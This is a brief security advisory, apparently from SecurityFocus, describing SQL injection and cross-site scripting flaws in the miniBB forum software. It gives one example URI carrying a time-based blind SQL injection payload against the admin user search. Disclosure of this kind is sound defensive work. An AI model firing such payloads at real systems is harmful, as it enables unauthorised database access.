miniBB SQL Injection and Multiple Cross Site Scripting Vulnerabilities

Attackers can use a browser to exploit the SQL-injection issue. An attacker must trick a victim into following a malicious URI to exploit cross-site scripting issues.

The following example URI is available:

http://www.example.com/bb_admin.php?action=searchusers2&searchus=id&whatus='+(SELECT 1 FROM (SELECT SLEEP(25))A)+'


 

Privacy Statement
Copyright 2010, SecurityFocus